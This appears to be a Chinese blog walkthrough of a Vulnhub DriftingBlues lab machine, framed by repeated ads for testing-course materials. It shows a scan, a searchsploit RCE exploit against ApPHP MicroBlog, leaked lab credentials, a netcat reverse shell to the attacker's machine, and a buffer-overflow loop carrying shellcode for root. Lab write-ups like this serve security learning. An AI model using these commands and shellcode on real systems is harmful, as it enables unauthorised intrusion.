既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
使用命令:
nmap -sS -A -T4 -n 192.168.205.145
开启了80
端口和111
端口 老样子先访问80
端口 直接查看源代码 发现了ApPHP MicroBlog
版本 为 v.1.0.1
(第一次遇到)
②:漏洞利用:
使用searchsploit
搜索相关漏洞 第二个就可以利用
使用命令将利用的脚本复制到本地:searchsploit -m php/webapps/33070.py
使用python2
执行脚本:python2 ./33070.py http://192.168.205.145
发现了数据库信息 里面有账号和密码 分别是:clapton/yaraklitepe
使用命令:ls /home
发现和数据用户一样 也可以 cat /etc/passwd
查看是否有nc
: whish nc
③:反弹shell:
在 kali
开启 nc
监听:nc -lvp 6666
在shell
执行:nc 192.168.205.133 6666 -e /bin/bash
使用命令交互shell
:python -c 'import pty;pty.spawn("/bin/bash")'
尝试切换用户 :clapton / yaraklitepe
获取到了第一个flag
④:缓冲区溢出提权:
这里给的提示 缓冲区才是解决方法(什么缓冲区!!!第一次遇到不会pwn)
for i in {1..10000}; do (./input $(python -c 'print("A" \* 171 + "\x10\x0c\x97\xbf" + "\x90"\* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
具体参考:https://www.ngui.cc/article/show-373956.html
https://blog.csdn.net/qq_32261191/article/details/117908644
⑤:获取flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
①:searchsploit
工具的用法
②:RCE
漏洞利用
③:缓冲区溢出提权(因为没基础所以还不怎么会 后续在学)
这也是DriftingBlues系列最后一个靶机的学习啦,希望大家也可以学习到新的一些知识点和一些渗透测试思路
最后创作不易 希望对大家有所帮助!!
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
路线、讲解视频,并且后续会持续更新**